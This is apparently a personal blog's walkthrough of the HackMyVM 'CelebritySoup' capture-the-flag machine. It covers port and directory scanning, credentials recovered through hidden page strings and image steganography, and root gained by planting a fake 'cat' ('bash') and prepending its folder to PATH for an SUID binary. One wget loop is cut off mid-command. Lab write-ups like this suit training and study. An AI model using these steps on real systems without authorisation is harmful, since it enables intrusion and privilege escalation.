Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm CelebritySoup Walkthrough

Machine can be download here.

nmap -p- -sC -sV --open -oN ports.log 192.168.56.57

图片.png

gobuster dir -u http://192.168.56.57 -t 50 -x .php,.html,.txt -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -b 400,403,404,500 --wildcard -o 80.log

图片.png

curl http://192.168.56.57/robots.txt

图片.png


Open contract1~4.html, check source code, find nothing.

Open sector1.html, check source code, find something.

图片.png


Download all sector*.html, and grep "secret*".

for i in $(seq 1 10) 
do
wget " 
done                      
grep  "secret" ./*.html

图片.png


Connect each string, get "puppetmaster", maybe a user name.

Also, sector9.html is different from others, and said something about secret place. Make a dictionary out of it, remember "--with-numbers".

cewl --with-numbers http://192.168.56.57/sector9.html > dic.txt


Scan files with this dic again.

gobuster dir -u http://192.168.56.57 -t 50 -x .php,.html,.txt -w dic.txt -b 400,403,404,500 --wildcard


图片.png


Open project2501.html, find a new big image file.

图片.png


Find the source of the image, and download it.

图片.png

图片.png


Decryp this image at "https://stylesuxx.github.io/steganography/".

Screenshot at 2021-02-04 08-34-41.png


Decrypt the binary string using CyberChef.

图片.png


Log in as "puppetmaster" using this string as password through ssh.

图片.png


In home folder, find "systeminfo" with SUID set.

图片.png


Directly run it, will show some information as user root.

图片.png


Decompile it, and find only "cat" is using relative path, the other command are all using absolute path.

图片.png


In home folder, create a fake "cat", and change the $PATH.

echo "bash" > cat
chmod +x cat
export PATH=/home/puppetmaster:$PATH


We can get root.

图片.png


发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.0